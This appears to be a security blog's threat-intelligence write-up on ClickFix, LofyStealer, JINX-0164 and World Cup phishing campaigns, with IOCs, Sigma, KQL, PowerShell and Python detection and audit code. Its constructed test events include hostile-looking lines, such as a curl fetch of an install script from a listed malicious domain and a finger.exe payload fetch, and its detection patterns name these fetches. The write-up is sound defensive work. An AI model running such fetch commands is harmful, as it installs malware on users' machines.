ClickFix, Ghost Stadium & JINX-0164: Multi-Vector Credential Harvesting Analysis

Security Arsenal Team
June 1, 2026
5 min read

Recent OTX pulses indicate a convergence of credential theft campaigns targeting both enterprise infrastructure and consumer ecosystems. The actors use diverse initial access vectors: ClickFix lures posing as a free image-editing tool (BackgroundFix), a developer-focused supply chain compromise (JINX-0164), and event-themed phishing built around the 2026 FIFA World Cup (GHOST STADIUM).

Collectively, these campaigns show a shift toward takedown-resistant C2 infrastructure: smart contracts on a blockchain testnet (EtherHiding) and large phishing-as-a-service (PhaaS) ecosystems. The primary objective across all identified actors is financial theft via credential harvesting, session hijacking, and cryptocurrency wallet compromise.

Threat Actor / Malware Profile

ClickFix / BackgroundFix

  • Malware Families: CastleLoader, NetSupport RAT, CastleStealer
  • Distribution: Social engineering lure masquerading as a free image-editing tool ("BackgroundFix").
  • Execution Chain: A fake "verify you are human" prompt instructs the user to copy a command to the clipboard and paste it into the Run dialog or a terminal. The command invokes finger.exe, a legacy Windows utility that retrieves text from a remote host over TCP port 79, to fetch the next-stage payload, which is then executed locally.
  • Payload Behavior: CastleLoader acts as a reflective loader to deploy NetSupport RAT (remote access) and CastleStealer (custom .NET infostealer).

LofyGang (LofyStealer)

  • Malware Families: LofyStealer, GrabBot, Chromelevator
  • Distribution: Targets Minecraft players via social engineering; payload hidden in game-related files.
  • Technical Details: Two-stage malware consisting of a 53.5MB Node.js-based loader and a 1.4MB native C++ payload operating in-memory.
  • Capabilities: Exfiltrates browser data (cookies, passwords, tokens), credit cards, and IBANs from 8+ browsers.

JINX-0164

  • Target: Cryptocurrency software developers.
  • Distribution: LinkedIn social engineering (recruiter persona) delivering trojanized npm packages or direct downloads.
  • Malware: AUDIOFIX (Python-based infostealer/RAT) and MINIRAT (Go backdoor).
  • Infrastructure: Typosquatted domains imitating Microsoft sign-in pages (e.g., login.teamicrosoft.com).

GHOST STADIUM

  • Campaign: Phishing-as-a-Service targeting the 2026 FIFA World Cup.
  • Malware: Vidar, Lumma.
  • Infrastructure: 4,300+ fraudulent domains, pixel-perfect FIFA authentication clones.

ClearFake (EtherHiding)

  • Technique: Uses smart contracts on the BNB Smart Chain testnet for C2 instructions.
  • Malware: SectopRAT, ACRStealer.
  • Delivery: JavaScript injected into compromised websites reads the current payload location from the contract, so operators update the chain rather than a server that can be taken down.

IOC Analysis

The provided IOCs consist of:

  • Domains: Typosquatted domains (login.teamicrosoft.com), lookalike fraud domains (fifa.gold, fifa.tax), and loader domains (trindastal.com).
  • File Hashes: SHA256 and MD5 hashes for the Node.js loaders, C++ payloads, and macOS install scripts.
  • URLs: Non-standard HTTP ports (e.g., :688) used by CastleLoader.
  • Hostnames: Infrastructure related to driver update scams and blockchain C2.

Operational Guidance: SOC teams should immediately ingest these hashes into EDR solutions for quarantine rules. Domains should be added to DNS sinkholes/blocklists; match the exact domain and its subdomains rather than substrings, so that entries like fifa.gold do not sweep in legitimate fifa.com traffic. HTTP traffic on the non-standard port 688 is a high-fidelity network anomaly to hunt for.
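The matching rules above (exact-or-subdomain for domains, any non-standard port for http/https, lower-cased SHA256 for hashes) are shown below as an added example, not code from the Security Arsenal team. The domains, the port and the hash values are the ones listed on this page; the proxy-log format ("timestamp src_ip url"), the source IPs and the sample lines are constructed for the demonstration.

```python
"""IOC matching over constructed proxy-log lines and file hashes.

Added example, not code from the Security Arsenal team. The domains, the
port and the SHA256 values are the ones listed on this page; the log format
('timestamp src_ip url'), the source IPs and the sample lines are assumptions.
"""
import hashlib
from urllib.parse import urlsplit

# Domains from the IOC list above. Matching is exact or on a subdomain, never
# substring, so the fifa.gold entry does not sweep in legitimate fifa.com traffic.
IOC_DOMAINS = {
    "login.teamicrosoft.com", "fifa.gold", "fifa.tax",
    "trindastal.com", "driver-updater.net",
}
# SHA256 values from the hunt script on this page, lower-case for comparison.
IOC_SHA256 = {
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
}
# Anything else on http/https (688 in particular) is reported as an anomaly.
STANDARD_WEB_PORTS = {80, 443}


def domain_matches(host, ioc_domains=IOC_DOMAINS):
    """True if host is an IOC domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ioc_domains)


def classify_url(url):
    """Return the reasons a URL is suspicious; an empty list means clean."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    if domain_matches(host):
        reasons.append(f"ioc-domain:{host}")
    try:
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        port = None
    if port is None:               # no explicit port: use the scheme default
        port = 443 if parts.scheme == "https" else 80
    if parts.scheme in ("http", "https") and port not in STANDARD_WEB_PORTS:
        reasons.append(f"non-standard-port:{port}")
    return reasons


def scan_proxy_log(lines):
    """Parse 'timestamp src_ip url' lines (assumed format) and return the hits."""
    hits = []
    for line in lines:
        ts, src, url = line.split(maxsplit=2)
        reasons = classify_url(url)
        if reasons:
            hits.append((ts, src, url, reasons))
    return hits


def sha256_in_iocs(data):
    """True if the SHA256 of the given bytes is on the IOC list."""
    return hashlib.sha256(data).hexdigest() in IOC_SHA256


# Constructed proxy log for the demonstration; not real traffic.
SAMPLE_LOG = [
    "2026-06-01T09:12:03Z 10.0.0.21 http://trindastal.com:688/",
    "2026-06-01T09:12:41Z 10.0.0.21 https://login.teamicrosoft.com/",
    "2026-06-01T09:13:10Z 10.0.0.22 https://www.fifa.com/",
    "2026-06-01T09:13:55Z 10.0.0.23 https://tickets.fifa.gold/",
    "2026-06-01T09:14:20Z 10.0.0.24 https://example.org/",
]

if __name__ == "__main__":
    for ts, src, url, reasons in scan_proxy_log(SAMPLE_LOG):
        print(f"{ts} {src} {url} -> {', '.join(reasons)}")
    print("sample bytes on IOC list:", sha256_in_iocs(b"not the loader"))
```

Run as-is it reports three of the five constructed lines: the trindastal.com fetch on port 688 (two reasons), the login.teamicrosoft.com hit, and the fifa.gold subdomain; the real fifa.com line is left alone, which is the point of matching on domain boundaries rather than substrings.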

Detection Engineering

Sigma Rules

YAML
title: Suspicious Finger.exe Execution - ClickFix Loader
id: 28767a84-4a1b-42b4-8b5d-c1a8c938d1e2
description: Detects the execution of finger.exe, which is abused by ClickFix/BackgroundFix to retrieve payloads.
status: experimental
date: 2026/06/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66756a725a4b6a
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate administrator usage (rare)
level: high
tags:
    - attack.execution
    - attack.t1204.002
    - attack.command_and_control
    - attack.t1105
---
title: Node.js Loader Spawning Shell - LofyStealer
id: 91f2c3b4-5a6d-4e7f-8b9a-1c2d3e4f5a6b
description: Detects Node.js processes spawning cmd.exe or powershell.exe, indicative of the LofyStealer Node.js loader executing payloads.
status: experimental
date: 2026/06/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66756a725a4b6b
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection
falsepositives:
    - Legitimate development toolchains (npm scripts, build tasks)
level: high
tags:
    - attack.execution
    - attack.t1059.003
    - attack.t1204.002
---
title: MacOS Install Script Download - JINX-0164
id: a3b4c5d6-e7f8-4a9b-8c7d-6e5f4a3b2c1d
description: Detects curl fetching, or sh/bash executing, install scripts that reference domains associated with JINX-0164 macOS malware.
status: experimental
date: 2026/06/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66756a725a4b6c
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith:
            - '/curl'
            - '/bash'
            - '/sh'
        CommandLine|contains:
            - 'install.sh'
            - 'driver-updater.net'
            - 'teamicrosoft.com'
    condition: selection
falsepositives:
    - Legitimate software updates
level: high
tags:
    - attack.execution
    - attack.t1059.004
    - attack.command_and_control
    - attack.t1105
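To see what the three rules above actually match, here is an added example (not code from the Security Arsenal team) that reimplements their selection logic in Python and runs it over constructed process-creation events carrying the Sysmon-style fields the rules reference (Image, ParentImage, CommandLine). The node.exe rule is evaluated as a ParentImage/Image pair. The event paths, command lines and the sample events themselves are assumptions; the JINX-0164 domains are the ones on this page.

```python
"""Evaluate the page's three process-creation detections over constructed events.

Added example, not the Security Arsenal team's code. Each event is a dict with
the fields the Sigma rules reference plus a 'product' tag. All events are
constructed; no real telemetry is included.
"""

# Hypothetical sample events (constructed).
SAMPLE_EVENTS = [
    {"product": "windows", "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger.exe user@198.51.100.10"},           # ClickFix stage fetch (constructed)
    {"product": "windows", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\victim\AppData\Roaming\game\node.exe",
     "CommandLine": "cmd.exe /c start stage2.exe"},             # Node loader spawning a shell (constructed)
    {"product": "windows", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},                                  # benign
    {"product": "macos", "Image": "/usr/bin/curl",
     "ParentImage": "/bin/zsh",
     "CommandLine": "curl -fsSL https://driver-updater.net/install.sh"},  # JINX-0164 lure domain from the page
    {"product": "macos", "Image": "/bin/bash",
     "ParentImage": "/bin/zsh",
     "CommandLine": "bash /usr/local/bin/brew-update.sh"},      # benign
    {"product": "macos", "Image": "/usr/bin/curl",
     "ParentImage": "/bin/zsh",
     "CommandLine": "curl -fsSL https://example.org/install.sh"},  # benign, but trips the install.sh marker
]


def rule_clickfix_finger(ev):
    """Suspicious Finger.exe Execution: Image|endswith '\\finger.exe'."""
    return ev["product"] == "windows" and ev["Image"].lower().endswith("\\finger.exe")


def rule_node_spawns_shell(ev):
    """Node.js Loader Spawning Shell: node.exe parent, cmd.exe/powershell.exe child."""
    return (ev["product"] == "windows"
            and ev["ParentImage"].lower().endswith("\\node.exe")
            and any(ev["Image"].lower().endswith(s) for s in ("\\cmd.exe", "\\powershell.exe")))


JINX_CMD_MARKERS = ("install.sh", "driver-updater.net", "teamicrosoft.com")


def rule_jinx_macos_fetch(ev):
    """MacOS Install Script Download: curl/bash/sh with a JINX-0164 marker on the command line."""
    return (ev["product"] == "macos"
            and any(ev["Image"].endswith(s) for s in ("/curl", "/bash", "/sh"))
            and any(m in ev["CommandLine"].lower() for m in JINX_CMD_MARKERS))


RULES = {
    "Suspicious Finger.exe Execution - ClickFix Loader": rule_clickfix_finger,
    "Node.js Loader Spawning Shell - LofyStealer": rule_node_spawns_shell,
    "MacOS Install Script Download - JINX-0164": rule_jinx_macos_fetch,
}


def evaluate(events):
    """Return (rule title, event index) pairs for every rule that fires, in event order."""
    hits = []
    for i, ev in enumerate(events):
        for title, rule in RULES.items():
            if rule(ev):
                hits.append((title, i))
    return hits


if __name__ == "__main__":
    for title, i in evaluate(SAMPLE_EVENTS):
        print(f"[{title}] event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Events 0, 1 and 3 fire the rule they were built for; event 2 and the brew script do not. Event 5, a curl of install.sh from an unrelated domain, also fires the JINX-0164 rule on the "install.sh" marker alone, which is the false positive the rule's falsepositives field acknowledges; if that is too noisy in your environment, require a domain term or a non-terminal parent process in the selection.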

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for CastleLoader traffic on port 688, network activity initiated by finger.exe,
// and the phishing/typosquat domains listed above.
// has_any matches the listed domains as whole terms; a bare "fifa." would also match legitimate FIFA hosts.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort == 688
    or InitiatingProcessFileName =~ "finger.exe"
    or RemoteUrl has_any ("fifa.gold", "fifa.tax", "trindastal.com", "teamicrosoft.com", "driver-updater.net")
| extend FullUrl = iff(RemotePort != 443 and RemotePort != 80, strcat(RemoteUrl, ":", tostring(RemotePort)), RemoteUrl)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort, FullUrl

PowerShell Hunt Script

PowerShell
# IOC Hunt for ClickFix Finger.exe Execution and LofyStealer File Artifacts
# SHA256 IOCs from this page; -contains is case-insensitive, so hash case does not matter.
$TargetHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881"
)

Write-Host "[+] Hunting for ClickFix Finger.exe processes..."
# Win32_Process exposes the command line and parent PID; resolve the parent name for triage.
$fingerProcs = @(Get-CimInstance Win32_Process -Filter "Name = 'finger.exe'")
foreach ($proc in $fingerProcs) {
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)"
    Write-Host "[!] ALERT: finger.exe running (PID: $($proc.ProcessId), Parent: $($parent.Name) [$($proc.ParentProcessId)], CommandLine: $($proc.CommandLine))" -ForegroundColor Red
}
if ($fingerProcs.Count -eq 0) {
    Write-Host "[-] No finger.exe processes found." -ForegroundColor Green
}

Write-Host "[+] Scanning recent files for LofyStealer/ClickFix Hashes..."
# Only files written in the last 7 days; the cutoff is computed once rather than per file.
$cutoff = (Get-Date).AddDays(-7)
$recentFiles = Get-ChildItem -Path "C:\Users\" -Recurse -File -Include *.exe, *.dll, *.js, *.node -ErrorAction SilentlyContinue |
               Where-Object { $_.LastWriteTime -gt $cutoff }

foreach ($file in $recentFiles) {
    # Locked or unreadable files return nothing; skip them instead of aborting the hunt.
    $fileHash = (Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($fileHash -and ($TargetHashes -contains $fileHash.ToLower())) {
        Write-Host "[!] MALWARE DETECTED: $($file.FullName) matches IOC hash." -ForegroundColor Red
    }
}
Write-Host "[+] Hunt complete."

Response Priorities

Immediate

  • Block IOCs: Add all listed domains, URLs, and file hashes to blocklists and EDR detection rules. Specifically, block traffic on non-standard port 688 unless explicitly allowed.
  • Hunt Execution: Run the provided PowerShell script across the enterprise to identify active finger.exe processes or malicious file hashes.

24 Hours

  • Identity Verification: If infrastructure shows signs of compromise (specifically by LofyStealer, CastleStealer, or Vidar), force a password reset and MFA re-enrollment for affected users and revoke session tokens for browser-based applications. These stealers exfiltrate cookies and tokens, so a password reset alone does not invalidate sessions the attacker already holds.
  • Supply Chain Audit: For technology and crypto sectors, audit recent npm package installations and software dependencies for signs of the JINX-0164 trojan.
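One concrete form that audit can take, as an added example that is not the Security Arsenal team's code and not a detector for JINX-0164 specifically (this page does not name the trojanized packages): three checks over a package-lock.json that catch what a trojanized npm dependency usually shows. hasInstallScript is the flag npm writes into lockfileVersion 2/3 entries for packages that declare preinstall/install/postinstall scripts; a resolved URL outside the registry corresponds to the "direct download" delivery described above; a one-character lookalike name is the typosquat pattern. The popular-package list and the sample lockfile are constructed.

```python
"""Audit an npm lockfile for install scripts, non-registry sources and lookalike names.

Added example, not the Security Arsenal team's code. The POPULAR list and
SAMPLE_LOCK are constructed; the package names in the sample are not real
packages referenced by this page.
"""
import json
from pathlib import Path

# Packages used as typosquat targets in this example (constructed list).
POPULAR = {"lodash", "express", "axios", "web3", "ethers"}
NPM_REGISTRY = "https://registry.npmjs.org/"


def edit_distance(a, b):
    """Levenshtein distance, used to spot one-character lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(name, popular=POPULAR):
    """Return the popular package this name imitates (distance 1), or None."""
    bare = name.split("/")[-1]            # drop a scope such as @org/
    for p in popular:
        if bare != p and edit_distance(bare, p) == 1:
            return p
    return None


def audit_lockfile(lock, popular=POPULAR, registry=NPM_REGISTRY):
    """Return (package name, finding) pairs from a lockfileVersion 2/3 'packages' map."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:                      # "" is the root project itself
            continue
        name = path.split("node_modules/")[-1]
        if meta.get("hasInstallScript"):  # npm sets this for pre/post/install scripts
            findings.append((name, "install-script"))
        resolved = meta.get("resolved", "")
        if resolved and not resolved.startswith(registry):
            findings.append((name, f"non-registry-source:{resolved}"))
        target = lookalike(name, popular)
        if target:
            findings.append((name, f"lookalike-of:{target}"))
    return findings


def load_lockfile(path):
    """Read a package-lock.json (lockfileVersion 2 or 3) from disk."""
    return json.loads(Path(path).read_text(encoding="utf-8"))


# Constructed lockfile fragment (not a real project).
SAMPLE_LOCK = {
    "name": "wallet-ui", "lockfileVersion": 3,
    "packages": {
        "": {"name": "wallet-ui", "dependencies": {"ethers": "^6.0.0"}},
        "node_modules/ethers": {
            "version": "6.13.0",
            "resolved": "https://registry.npmjs.org/ethers/-/ethers-6.13.0.tgz"},
        "node_modules/etherz": {                       # hypothetical lookalike
            "version": "1.0.2",
            "resolved": "https://registry.npmjs.org/etherz/-/etherz-1.0.2.tgz",
            "hasInstallScript": True},
        "node_modules/recruiter-assignment": {         # hypothetical "take-home task" tarball
            "version": "0.0.1",
            "resolved": "https://example.invalid/take-home.tgz",
            "hasInstallScript": True},
    },
}

if __name__ == "__main__":
    import sys
    lock = load_lockfile(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOCK
    for name, finding in audit_lockfile(lock):
        print(f"{name}: {finding}")
```

Point it at a real lockfile with `python audit.py package-lock.json`. The install-script check is the one to act on first: a lifecycle script runs on `npm install` under the developer's account, which is exactly when a recruiter's "take-home task" turns into an infostealer.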

1 Week

  • Architecture Hardening: Restrict the use of legacy utilities like finger.exe via Application Control policies (AppLocker or WDAC). Implement network segmentation to prevent gaming systems (Minecraft targets) from accessing critical enterprise assets.
  • User Awareness: Brief staff on the specific threat of LinkedIn recruitment scams (JINX-0164) and World Cup ticket fraud (GHOST STADIUM).
